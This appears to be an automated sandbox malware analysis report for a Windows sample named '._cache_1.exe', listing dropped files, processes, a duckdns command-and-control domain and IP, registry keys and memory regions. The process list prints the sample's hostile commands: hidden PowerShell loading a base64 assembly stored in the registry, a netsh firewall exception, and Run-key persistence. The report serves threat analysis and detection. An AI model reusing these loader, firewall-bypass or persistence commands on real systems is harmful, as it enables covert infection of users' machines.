Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
._cache_1.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\Tr.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\x.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\x.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\aut512C.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\autC301.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\d0tyoy35.pd2.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hd4k0f3o.akt.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\pwsmr00r.pjt.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\xn2vqlzp.znx.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF44a554.TMP
(copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PKVJK6R4786INHH74LL9.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TT2NP7KQGD8NJDGHFW0B.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Hidden,
Archive, ctime=Mon Jul 1 07:21:26 2024, mtime=Mon Jul 1 07:21:26 2024, atime=Mon Jul 1 07:21:24 2024, length=1178304, window=hide
|
modified
|
There are 7 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\._cache_1.exe
|
"C:\Users\user\Desktop\._cache_1.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Tr.exe
|
"C:\Users\user\AppData\Local\Temp\Tr.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty
HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty
HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
|
|
|
|
C:\Windows\System32\netsh.exe
|
netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty
HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty
HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
|
|
|
|
C:\Users\user\AppData\Local\Temp\x.exe
|
"C:\Users\user\AppData\Local\Temp\x.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Tr.exe
|
"C:\Users\user\AppData\Local\Temp\Tr.exe"
|
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.piriform.com/ccleaner
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
|
unknown
|
||
|
http://www.piriform.com/ccleanerv
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.piriform.com/cb
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.piriform.coh
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
There are 1 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
water-boom.duckdns.org
|
192.169.69.25
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.169.69.25
|
water-boom.duckdns.org
|
United States
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\Software
|
Valuex
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
|
AdobeMX
|
|
|
|
HKEY_CURRENT_USER\Environment
|
SEE_MASK_NOZONECHECKS
|
|
|
|
HKEY_CURRENT_USER\Software
|
Valuex
|
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
296C000
|
trusted library allocation
|
page read and write
|
|
|
|
2D1A000
|
trusted library allocation
|
page read and write
|
|
|
|
2610000
|
heap
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
1A955000
|
heap
|
page read and write
|
||
|
1B740000
|
heap
|
page read and write
|
||
|
7FE93EF0000
|
trusted library allocation
|
page read and write
|
||
|
1B34F000
|
heap
|
page read and write
|
||
|
276F000
|
stack
|
page read and write
|
||
|
7FE93C53000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A9CE000
|
heap
|
page read and write
|
||
|
9FA000
|
heap
|
page read and write
|
||
|
396000
|
heap
|
page read and write
|
||
|
2A6000
|
heap
|
page read and write
|
||
|
7FE93D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
15B000
|
stack
|
page read and write
|
||
|
7FE93F60000
|
trusted library allocation
|
page read and write
|
||
|
CE4000
|
heap
|
page read and write
|
||
|
D4B000
|
heap
|
page read and write
|
||
|
D06000
|
heap
|
page read and write
|
||
|
7FE93C23000
|
trusted library allocation
|
page execute and read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
7FE93EE0000
|
trusted library allocation
|
page read and write
|
||
|
1BB8F000
|
stack
|
page read and write
|
||
|
2E5F000
|
stack
|
page read and write
|
||
|
1A96E000
|
heap
|
page execute and read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
29FF000
|
unkown
|
page read and write
|
||
|
856000
|
heap
|
page read and write
|
||
|
1B8000
|
heap
|
page read and write
|
||
|
996000
|
heap
|
page read and write
|
||
|
D64000
|
heap
|
page read and write
|
||
|
1E60000
|
heap
|
page execute and read and write
|
||
|
993000
|
heap
|
page read and write
|
||
|
3B4F000
|
stack
|
page read and write
|
||
|
209B000
|
heap
|
page read and write
|
||
|
986000
|
heap
|
page read and write
|
||
|
7FE93F50000
|
trusted library allocation
|
page read and write
|
||
|
2400000
|
trusted library allocation
|
page read and write
|
||
|
2E6000
|
heap
|
page read and write
|
||
|
1B40F000
|
stack
|
page read and write
|
||
|
1B310000
|
heap
|
page read and write
|
||
|
D8C000
|
heap
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
7FE93E20000
|
trusted library allocation
|
page read and write
|
||
|
261000
|
heap
|
page read and write
|
||
|
1B2F9000
|
stack
|
page read and write
|
||
|
2A26000
|
trusted library allocation
|
page read and write
|
||
|
2D0D000
|
heap
|
page read and write
|
||
|
7FE93E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
25BF000
|
stack
|
page read and write
|
||
|
7FE93ED0000
|
trusted library allocation
|
page read and write
|
||
|
2720000
|
heap
|
page read and write
|
||
|
294000
|
heap
|
page read and write
|
||
|
4AB000
|
unkown
|
page readonly
|
||
|
7FE93F10000
|
trusted library allocation
|
page read and write
|
||
|
A17000
|
heap
|
page read and write
|
||
|
7FE93E40000
|
trusted library allocation
|
page read and write
|
||
|
B82000
|
unkown
|
page write copy
|
||
|
334000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
7FE93D06000
|
trusted library allocation
|
page read and write
|
||
|
482000
|
unkown
|
page readonly
|
||
|
1B176000
|
heap
|
page read and write
|
||
|
3EF000
|
heap
|
page read and write
|
||
|
7FE93F40000
|
trusted library allocation
|
page read and write
|
||
|
D1A000
|
heap
|
page read and write
|
||
|
9D7000
|
heap
|
page read and write
|
||
|
7FE93D00000
|
trusted library allocation
|
page read and write
|
||
|
1B7AC000
|
heap
|
page read and write
|
||
|
467000
|
unkown
|
page readonly
|
||
|
1CAB000
|
heap
|
page read and write
|
||
|
9FF000
|
heap
|
page read and write
|
||
|
12781000
|
trusted library allocation
|
page read and write
|
||
|
A13000
|
heap
|
page read and write
|
||
|
1A7C1000
|
heap
|
page read and write
|
||
|
7FE93C6B000
|
trusted library allocation
|
page read and write
|
||
|
1BA3F000
|
stack
|
page read and write
|
||
|
2065000
|
heap
|
page read and write
|
||
|
26C2000
|
heap
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
9FF000
|
heap
|
page read and write
|
||
|
7FE93C60000
|
trusted library allocation
|
page read and write
|
||
|
D4B000
|
heap
|
page read and write
|
||
|
9F8000
|
heap
|
page read and write
|
||
|
DE9000
|
heap
|
page read and write
|
||
|
1B37F000
|
stack
|
page read and write
|
||
|
D6B000
|
heap
|
page read and write
|
||
|
7FE93D40000
|
trusted library allocation
|
page execute and read and write
|
||
|
A10000
|
heap
|
page read and write
|
||
|
1B28E000
|
stack
|
page read and write | page guard
|
||
|
1C810000
|
heap
|
page read and write
|
||
|
A9D000
|
heap
|
page read and write
|
||
|
7FE93D36000
|
trusted library allocation
|
page execute and read and write
|
||
|
D66000
|
heap
|
page read and write
|
||
|
2DD000
|
heap
|
page read and write
|
||
|
A04000
|
heap
|
page read and write
|
||
|
7FE93DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE93E90000
|
trusted library allocation
|
page read and write
|
||
|
7FE93D0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE93DDC000
|
trusted library allocation
|
page read and write
|
||
|
D6B000
|
heap
|
page read and write
|
||
|
8B000
|
stack
|
page read and write
|
||
|
1A981000
|
heap
|
page read and write
|
||
|
8B000
|
stack
|
page read and write
|
||
|
3F4F000
|
stack
|
page read and write
|
||
|
89C000
|
stack
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
1EE000
|
heap
|
page read and write
|
||
|
A0F000
|
heap
|
page read and write
|
||
|
2C46000
|
trusted library allocation
|
page read and write
|
||
|
27F000
|
heap
|
page read and write
|
||
|
1BE000
|
heap
|
page read and write
|
||
|
D8A000
|
heap
|
page read and write
|
||
|
491000
|
unkown
|
page write copy
|
||
|
1B319000
|
heap
|
page read and write
|
||
|
A87000
|
heap
|
page read and write
|
||
|
239000
|
heap
|
page read and write
|
||
|
7FE93E80000
|
trusted library allocation
|
page read and write
|
||
|
1B50000
|
heap
|
page read and write
|
||
|
1C4000
|
heap
|
page read and write
|
||
|
9FB000
|
heap
|
page read and write
|
||
|
36D0000
|
heap
|
page read and write
|
||
|
1A794000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
9DB000
|
heap
|
page read and write
|
||
|
7FE93E50000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
1AECA000
|
stack
|
page read and write
|
||
|
1C70000
|
heap
|
page read and write
|
||
|
D63000
|
heap
|
page read and write
|
||
|
2639000
|
stack
|
page read and write
|
||
|
3BAF000
|
stack
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
7FE93CD0000
|
trusted library allocation
|
page read and write
|
||
|
B4F000
|
unkown
|
page readonly
|
||
|
7FFFFEF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE93EC0000
|
trusted library allocation
|
page read and write
|
||
|
7FE93D06000
|
trusted library allocation
|
page execute and read and write
|
||
|
A16000
|
heap
|
page read and write
|
||
|
1D24000
|
heap
|
page read and write
|
||
|
8BA000
|
stack
|
page read and write
|
||
|
F0000
|
heap
|
page read and write
|
||
|
4A8000
|
unkown
|
page read and write
|
||
|
1E30000
|
trusted library allocation
|
page read and write
|
||
|
3C6000
|
heap
|
page read and write
|
||
|
D6B000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
26A0000
|
heap
|
page read and write
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
25E0000
|
heap
|
page read and write
|
||
|
7FE93CDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
1C60000
|
trusted library section
|
page read and write
|
||
|
A7C000
|
heap
|
page read and write
|
||
|
1B7D3000
|
heap
|
page read and write
|
||
|
7FE93E28000
|
trusted library allocation
|
page read and write
|
||
|
4AB000
|
unkown
|
page readonly
|
||
|
1BA6000
|
heap
|
page read and write
|
||
|
3370000
|
heap
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
2300000
|
trusted library allocation
|
page read and write
|
||
|
A14000
|
heap
|
page read and write
|
||
|
8AE000
|
stack
|
page read and write
|
||
|
1EEE000
|
stack
|
page read and write
|
||
|
2844000
|
heap
|
page read and write
|
||
|
D90000
|
heap
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
22E0000
|
trusted library allocation
|
page read and write
|
||
|
9E8000
|
heap
|
page read and write
|
||
|
7FE93E80000
|
trusted library allocation
|
page read and write
|
||
|
940000
|
heap
|
page read and write
|
||
|
7FE93C22000
|
trusted library allocation
|
page read and write
|
||
|
D4B000
|
heap
|
page read and write
|
||
|
D0F000
|
heap
|
page read and write
|
||
|
82B000
|
heap
|
page read and write
|
||
|
6DC000
|
stack
|
page read and write
|
||
|
482000
|
unkown
|
page readonly
|
||
|
2C7F000
|
stack
|
page read and write
|
||
|
290000
|
trusted library allocation
|
page read and write
|
||
|
7FE93E30000
|
trusted library allocation
|
page read and write
|
||
|
997000
|
heap
|
page read and write
|
||
|
27C000
|
heap
|
page read and write
|
||
|
A29000
|
heap
|
page read and write
|
||
|
7FE93C30000
|
trusted library allocation
|
page read and write
|
||
|
9E1000
|
heap
|
page read and write
|
||
|
1B7C3000
|
heap
|
page read and write
|
||
|
A88000
|
heap
|
page read and write
|
||
|
D93000
|
heap
|
page read and write
|
||
|
D84000
|
heap
|
page read and write
|
||
|
1D0A000
|
trusted library allocation
|
page read and write
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
1A938000
|
heap
|
page execute and read and write
|
||
|
D0B000
|
heap
|
page read and write
|
||
|
A0E000
|
heap
|
page read and write
|
||
|
482000
|
unkown
|
page readonly
|
||
|
7FE93F50000
|
trusted library allocation
|
page read and write
|
||
|
1A97E000
|
heap
|
page read and write
|
||
|
3B6000
|
heap
|
page read and write
|
||
|
E70000
|
heap
|
page read and write
|
||
|
1B86000
|
heap
|
page read and write
|
||
|
1ADC9000
|
stack
|
page read and write
|
||
|
6DA000
|
stack
|
page read and write
|
||
|
12831000
|
trusted library allocation
|
page read and write
|
||
|
9FB000
|
heap
|
page read and write
|
||
|
331E000
|
stack
|
page read and write
|
||
|
A02000
|
heap
|
page read and write
|
||
|
D6C000
|
heap
|
page read and write
|
||
|
A24000
|
heap
|
page read and write
|
||
|
D77000
|
heap
|
page read and write
|
||
|
995000
|
heap
|
page read and write
|
||
|
3F8E000
|
stack
|
page read and write
|
||
|
D55000
|
heap
|
page read and write
|
||
|
2B4000
|
heap
|
page read and write
|
||
|
23CD000
|
stack
|
page read and write
|
||
|
1B6DF000
|
stack
|
page read and write
|
||
|
B87000
|
unkown
|
page readonly
|
||
|
A54000
|
heap
|
page read and write
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
A8B000
|
heap
|
page read and write
|
||
|
7FE93CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AA02000
|
heap
|
page read and write
|
||
|
A29000
|
heap
|
page read and write
|
||
|
9EE000
|
heap
|
page read and write
|
||
|
1E20000
|
trusted library allocation
|
page read and write
|
||
|
7FE93EB0000
|
trusted library allocation
|
page read and write
|
||
|
CC7000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
256D000
|
heap
|
page read and write
|
||
|
45E000
|
unkown
|
page read and write
|
||
|
A20000
|
heap
|
page read and write
|
||
|
490000
|
unkown
|
page read and write
|
||
|
28B000
|
heap
|
page read and write
|
||
|
990000
|
heap
|
page read and write
|
||
|
2660000
|
heap
|
page read and write
|
||
|
428000
|
heap
|
page read and write
|
||
|
C15000
|
heap
|
page read and write
|
||
|
7FE93E05000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
A3A000
|
heap
|
page read and write
|
||
|
99B000
|
heap
|
page read and write
|
||
|
1C5C0000
|
heap
|
page read and write
|
||
|
A02000
|
heap
|
page read and write
|
||
|
1B446000
|
heap
|
page read and write
|
||
|
19E000
|
stack
|
page read and write
|
||
|
1AD40000
|
heap
|
page read and write
|
||
|
1D00000
|
trusted library allocation
|
page read and write
|
||
|
1B750000
|
heap
|
page read and write
|
||
|
7FE93C63000
|
trusted library allocation
|
page read and write
|
||
|
1A770000
|
heap
|
page read and write
|
||
|
D5E000
|
heap
|
page read and write
|
||
|
438000
|
heap
|
page read and write
|
||
|
A0C000
|
heap
|
page read and write
|
||
|
7FE93DF2000
|
trusted library allocation
|
page read and write
|
||
|
1B40F000
|
stack
|
page read and write
|
||
|
A10000
|
heap
|
page read and write
|
||
|
1CFE000
|
stack
|
page read and write
|
||
|
1ADBF000
|
stack
|
page read and write
|
||
|
24B0000
|
heap
|
page read and write
|
||
|
D76000
|
heap
|
page read and write
|
||
|
2660000
|
heap
|
page execute and read and write
|
||
|
D4C000
|
heap
|
page read and write
|
||
|
A05000
|
heap
|
page read and write
|
||
|
9F5000
|
heap
|
page read and write
|
||
|
A02000
|
heap
|
page read and write
|
||
|
D68000
|
heap
|
page read and write
|
||
|
1EE000
|
heap
|
page read and write
|
||
|
7FE93CD6000
|
trusted library allocation
|
page read and write
|
||
|
A1C000
|
heap
|
page read and write
|
||
|
7FE93E35000
|
trusted library allocation
|
page read and write
|
||
|
9DB000
|
heap
|
page read and write
|
||
|
9FE000
|
heap
|
page read and write
|
||
|
7F4000
|
heap
|
page read and write
|
||
|
3A0000
|
unkown
|
page readonly
|
||
|
9EC000
|
heap
|
page read and write
|
||
|
7FE93E38000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
201000
|
heap
|
page read and write
|
||
|
287D000
|
trusted library allocation
|
page read and write
|
||
|
1D65000
|
heap
|
page read and write
|
||
|
2770000
|
trusted library section
|
page read and write
|
||
|
45E000
|
unkown
|
page write copy
|
||
|
A02000
|
heap
|
page read and write
|
||
|
2550000
|
heap
|
page read and write
|
||
|
102000
|
stack
|
page read and write
|
||
|
D82000
|
heap
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
7FE93DF0000
|
trusted library allocation
|
page read and write
|
||
|
A13000
|
heap
|
page read and write
|
||
|
7FE93EF0000
|
trusted library allocation
|
page read and write
|
||
|
276E000
|
stack
|
page read and write | page guard
|
||
|
7FE93F30000
|
trusted library allocation
|
page read and write
|
||
|
1277F000
|
trusted library allocation
|
page read and write
|
||
|
1B7CD000
|
heap
|
page read and write
|
||
|
1B9DA000
|
stack
|
page read and write
|
||
|
276E000
|
stack
|
page read and write | page guard
|
||
|
994000
|
heap
|
page read and write
|
||
|
2054000
|
heap
|
page read and write
|
||
|
A03000
|
heap
|
page read and write
|
||
|
27A0000
|
heap
|
page read and write
|
||
|
2771000
|
trusted library allocation
|
page read and write
|
||
|
D7E000
|
heap
|
page read and write
|
||
|
1A820000
|
heap
|
page read and write
|
||
|
A23000
|
heap
|
page read and write
|
||
|
AC0000
|
unkown
|
page readonly
|
||
|
B74000
|
unkown
|
page readonly
|
||
|
AC0000
|
unkown
|
page readonly
|
||
|
2060000
|
heap
|
page read and write
|
||
|
1AD44000
|
heap
|
page read and write
|
||
|
D71000
|
heap
|
page read and write
|
||
|
98C000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
3FAF000
|
stack
|
page read and write
|
||
|
130000
|
heap
|
page read and write
|
||
|
A75000
|
heap
|
page read and write
|
||
|
24CD000
|
heap
|
page read and write
|
||
|
8BC000
|
stack
|
page read and write
|
||
|
1B28F000
|
stack
|
page read and write
|
||
|
1B4DE000
|
stack
|
page read and write
|
||
|
1B772000
|
heap
|
page read and write
|
||
|
7FE93F00000
|
trusted library allocation
|
page read and write
|
||
|
490000
|
unkown
|
page read and write
|
||
|
1AE5A000
|
stack
|
page read and write
|
||
|
89F000
|
stack
|
page read and write
|
||
|
4A8000
|
unkown
|
page read and write
|
||
|
A37000
|
heap
|
page read and write
|
||
|
D51000
|
heap
|
page read and write
|
||
|
B87000
|
unkown
|
page readonly
|
||
|
7FE93E32000
|
trusted library allocation
|
page read and write
|
||
|
2664000
|
heap
|
page read and write
|
||
|
3F50000
|
trusted library allocation
|
page read and write
|
||
|
1C70000
|
trusted library section
|
page read and write
|
||
|
482000
|
unkown
|
page readonly
|
||
|
6BE000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
AC1000
|
unkown
|
page execute read
|
||
|
D79000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
1A930000
|
heap
|
page execute and read and write
|
||
|
1F70000
|
trusted library allocation
|
page read and write
|
||
|
950000
|
heap
|
page read and write
|
||
|
D5C000
|
heap
|
page read and write
|
||
|
A14000
|
heap
|
page read and write
|
||
|
1E10000
|
trusted library allocation
|
page read and write
|
||
|
7FE93F20000
|
trusted library allocation
|
page read and write
|
||
|
A12000
|
heap
|
page read and write
|
||
|
D8A000
|
heap
|
page read and write
|
||
|
42F000
|
unkown
|
page readonly
|
||
|
7FE93D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
9F6000
|
heap
|
page read and write
|
||
|
9E5000
|
heap
|
page read and write
|
||
|
1B7D0000
|
heap
|
page read and write
|
||
|
1D06000
|
trusted library allocation
|
page read and write
|
||
|
1F6000
|
heap
|
page read and write
|
||
|
7FE93C2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
9F4000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2821000
|
trusted library allocation
|
page read and write
|
||
|
9FF000
|
heap
|
page read and write
|
||
|
2840000
|
heap
|
page read and write
|
||
|
7FE93E60000
|
trusted library allocation
|
page read and write
|
||
|
1B140000
|
heap
|
page read and write
|
||
|
7FE93F00000
|
trusted library allocation
|
page read and write
|
||
|
A6E000
|
heap
|
page read and write
|
||
|
26A000
|
stack
|
page read and write
|
||
|
AC1000
|
unkown
|
page execute read
|
||
|
42F000
|
unkown
|
page readonly
|
||
|
2CF7000
|
trusted library allocation
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
A83000
|
heap
|
page read and write
|
||
|
9B4000
|
heap
|
page read and write
|
||
|
A00000
|
heap
|
page read and write
|
||
|
7FE93E90000
|
trusted library allocation
|
page read and write
|
||
|
7FE93C5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE93ED0000
|
trusted library allocation
|
page read and write
|
||
|
A04000
|
heap
|
page read and write
|
||
|
3A1000
|
unkown
|
page execute read
|
||
|
B74000
|
unkown
|
page readonly
|
||
|
A06000
|
heap
|
page read and write
|
||
|
6CE000
|
stack
|
page read and write
|
||
|
D53000
|
heap
|
page read and write
|
||
|
A79000
|
heap
|
page read and write
|
||
|
7FE93E50000
|
trusted library allocation
|
page read and write
|
||
|
C4B000
|
heap
|
page read and write
|
||
|
99B000
|
heap
|
page read and write
|
||
|
1B7B6000
|
heap
|
page read and write
|
||
|
12851000
|
trusted library allocation
|
page read and write
|
||
|
D5F000
|
heap
|
page read and write
|
||
|
1B7000
|
heap
|
page read and write
|
||
|
7FE93DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
9EC000
|
heap
|
page read and write
|
||
|
2050000
|
heap
|
page read and write
|
||
|
32E0000
|
trusted library allocation
|
page read and write
|
||
|
4AB000
|
unkown
|
page readonly
|
||
|
462000
|
unkown
|
page write copy
|
||
|
7FE93EE0000
|
trusted library allocation
|
page read and write
|
||
|
25FF000
|
stack
|
page read and write
|
||
|
A48000
|
heap
|
page read and write
|
||
|
1A824000
|
heap
|
page read and write
|
||
|
4AB000
|
unkown
|
page readonly
|
||
|
A1C000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
384000
|
heap
|
page read and write
|
||
|
7FE93E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
26A4000
|
heap
|
page read and write
|
||
|
880000
|
heap
|
page read and write
|
||
|
2CEF000
|
stack
|
page read and write
|
||
|
D72000
|
heap
|
page read and write
|
||
|
438F000
|
stack
|
page read and write
|
||
|
7FE93DD3000
|
trusted library allocation
|
page read and write
|
||
|
9AB000
|
heap
|
page read and write
|
||
|
A30000
|
heap
|
page read and write
|
||
|
A09000
|
heap
|
page read and write
|
||
|
DE9000
|
heap
|
page read and write
|
||
|
ED0000
|
heap
|
page read and write
|
||
|
A24000
|
heap
|
page read and write
|
||
|
2D2000
|
heap
|
page read and write
|
||
|
7FE93E58000
|
trusted library allocation
|
page read and write
|
||
|
276F000
|
stack
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
7FE93C52000
|
trusted library allocation
|
page read and write
|
||
|
D67000
|
heap
|
page read and write
|
||
|
290000
|
heap
|
page read and write
|
||
|
1A9FC000
|
heap
|
page read and write
|
||
|
490000
|
unkown
|
page write copy
|
||
|
7FE93F45000
|
trusted library allocation
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
269B000
|
heap
|
page read and write
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
24BF000
|
stack
|
page read and write
|
||
|
1D60000
|
heap
|
page read and write
|
||
|
7FE93E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
B7E000
|
unkown
|
page write copy
|
||
|
A06000
|
heap
|
page read and write
|
||
|
9EC000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2310000
|
trusted library allocation
|
page read and write
|
||
|
492000
|
unkown
|
page read and write
|
||
|
7FE93F30000
|
trusted library allocation
|
page read and write
|
||
|
2560000
|
heap
|
page execute and read and write
|
||
|
7FE93E60000
|
trusted library allocation
|
page read and write
|
||
|
A0B000
|
heap
|
page read and write
|
||
|
A76000
|
heap
|
page read and write
|
||
|
9EF000
|
heap
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
A01000
|
heap
|
page read and write
|
||
|
990000
|
heap
|
page read and write
|
||
|
D7F000
|
heap
|
page read and write
|
||
|
127A1000
|
trusted library allocation
|
page read and write
|
||
|
423000
|
heap
|
page read and write
|
||
|
D7E000
|
heap
|
page read and write
|
||
|
454000
|
unkown
|
page readonly
|
||
|
A1A000
|
heap
|
page read and write
|
||
|
1B410000
|
heap
|
page read and write
|
||
|
1AA4E000
|
stack
|
page read and write
|
||
|
1C514000
|
stack
|
page read and write
|
||
|
9F7000
|
heap
|
page read and write
|
||
|
240000
|
heap
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
7FE93F40000
|
trusted library allocation
|
page read and write
|
||
|
38E000
|
heap
|
page read and write
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
7FE93E03000
|
trusted library allocation
|
page read and write
|
||
|
9A0000
|
trusted library allocation
|
page read and write
|
||
|
CFC000
|
heap
|
page read and write
|
||
|
D83000
|
heap
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
D5C000
|
heap
|
page read and write
|
||
|
A27000
|
heap
|
page read and write
|
||
|
B4F000
|
unkown
|
page readonly
|
||
|
1B610000
|
heap
|
page read and write
|
||
|
1D20000
|
heap
|
page read and write
|
||
|
12827000
|
trusted library allocation
|
page read and write
|
||
|
1AAEE000
|
stack
|
page read and write
|
||
|
D87000
|
heap
|
page read and write
|
||
|
9FB000
|
heap
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
8DD000
|
stack
|
page read and write
|
||
|
9F3000
|
heap
|
page read and write
|
||
|
24CF000
|
heap
|
page read and write
|
||
|
9F8000
|
heap
|
page read and write
|
||
|
424000
|
heap
|
page read and write
|
||
|
7FE93C33000
|
trusted library allocation
|
page read and write
|
||
|
1293B000
|
trusted library allocation
|
page read and write
|
||
|
7FE93E70000
|
trusted library allocation
|
page read and write
|
||
|
A07000
|
heap
|
page read and write
|
||
|
A24000
|
heap
|
